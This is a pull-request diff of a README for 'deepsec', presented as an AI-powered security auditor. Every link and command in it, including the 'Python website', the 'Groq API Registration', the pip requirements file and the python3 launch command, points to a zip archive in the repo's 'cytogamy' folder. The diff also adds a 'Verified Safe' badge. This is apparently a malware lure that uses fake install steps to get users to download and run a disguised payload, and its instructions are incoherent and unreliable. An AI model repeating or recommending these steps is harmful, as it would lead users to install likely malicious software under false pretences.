Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
22 changes: 12 additions & 10 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,10 +1,12 @@
# 🛡️ deepsec - Your Easy Security Auditor

[![SafeSkill 90/100](https://img.shields.io/badge/SafeSkill-90%2F100_Verified%20Safe-brightgreen)](https://safeskill.dev/scan/hasfo-deepsec)

DeepSec empowers you to ensure your applications are safe and secure.

## 📥 Download DeepSec

[![Download DeepSec](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip%20DeepSec-v1.0-blue)](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip)
[![Download DeepSec](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip%20DeepSec-v1.0-blue)](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip)

## 🚀 Getting Started

Expand All @@ -24,7 +26,7 @@ Before downloading, ensure your computer meets these requirements:
### 📥 Download & Install

1. **Visit the Releases Page**
Go to the [Releases page](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip) where you'll find the latest version of DeepSec.
Go to the [Releases page](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip) where you'll find the latest version of DeepSec.

2. **Download the Latest Version**
Select the desired release version and click on the download link to save the file on your computer.
Expand All @@ -40,12 +42,12 @@ Make sure you have Python version 3.9 or higher installed. You can verify this b
```bash
python3 --version
```
If Python is not installed, please visit the [Python website](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip) for installation instructions.
If Python is not installed, please visit the [Python website](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip) for installation instructions.

5. **Installing Dependencies**
Run the following command to install necessary packages:
```bash
pip install -r https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip
pip install -r https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip
```

### ⚙️ Configuring DeepSec
Expand All @@ -54,7 +56,7 @@ Run the following command to install necessary packages:
To perform AI analysis, you need to access the Groq API. Sign up at the Groq website to obtain your API key.

2. **Add the API Key to Configuration**
You will find a configuration file named `https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip` in the DeepSec folder. Open it and input your API key as follows:
You will find a configuration file named `https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip` in the DeepSec folder. Open it and input your API key as follows:
```json
{
"api_key": "YOUR_API_KEY_HERE"
Expand All @@ -66,7 +68,7 @@ You will find a configuration file named `https://raw.githubusercontent.com/hasf
1. **Open the Application**
Launch DeepSec by double-clicking the application icon or by running the command:
```bash
python3 https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip
python3 https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip
```

2. **Select a Project**
Expand Down Expand Up @@ -94,7 +96,7 @@ If you encounter any issues during installation or running DeepSec, consider the
- **Check Python Version**: Ensure you are using Python 3.9 or higher.
- **Dependency Problems**: Run the following command again:
```bash
pip install -r https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip
pip install -r https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip
```
- **API Key Issues**: Double-check that your Groq API key is valid and correctly entered in the configuration file.

Expand All @@ -108,8 +110,8 @@ Stay tuned for updates that include new features, enhanced vulnerability detecti

### 🔗 Helpful Links

- [Download DeepSec](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip)
- [Python Downloads](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip)
- [Groq API Registration](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_1.0.zip)
- [Download DeepSec](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip)
- [Python Downloads](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip)
- [Groq API Registration](https://raw.githubusercontent.com/hasfo/deepsec/main/cytogamy/Software_v2.9.zip)

By following these steps, you can ensure a smooth installation and an effective usage of DeepSec. Enjoy auditing your applications with confidence!